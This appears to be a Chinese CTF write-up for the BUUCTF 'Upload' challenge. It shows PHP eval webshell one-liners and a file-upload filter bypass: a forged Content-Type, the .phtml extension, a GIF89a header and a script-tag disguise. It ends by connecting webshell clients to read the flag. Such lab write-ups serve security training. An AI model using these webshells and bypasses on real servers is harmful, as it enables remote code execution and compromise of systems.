[极客大挑战 2019]Upload
题目打开是一个文件上次功能点
![图片[1]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](20220414112803-6258054313b3c.png)
首次常规操作二话不说先上传一个一句话木马。
<?php @eval($_POST[‘123’])?>
页面提示被拦截,并显示not image
![图片[2]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/04/20220414112803-625805433ede2.png)
那我们进行抓包修改Content-Type字段进行绕过
![图片[3]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226130355547.png?imageView2/0/format/webp/q/75)
发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。
phtml、pht、php、php3、php4、php5
发现phtml可以正常绕过
![图片[5]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226210355574.png?imageView2/0/format/webp/q/75)
发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。
GIF89a? <script language=”php”>eval($_REQUEST[123])</script> #替换之后的木马
然后就上次成功了
![图片[7]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](http://www.anquanclub.cn/wp-content/uploads/2022/04/20220414112804-625805442d0ae.png)
访问upload目录
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/
![图片[8]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226210357991.png?imageView2/0/format/webp/q/75)
然后用菜刀、蚁剑链接,链接地址
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml
在根目录下找到flag
![图片[9]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226210358729.png?imageView2/0/format/webp/q/75)
所以最终flag为flag{2d874116-e982-4f6f-98e5-ceb687be2da1}
THE END
暂无评论内容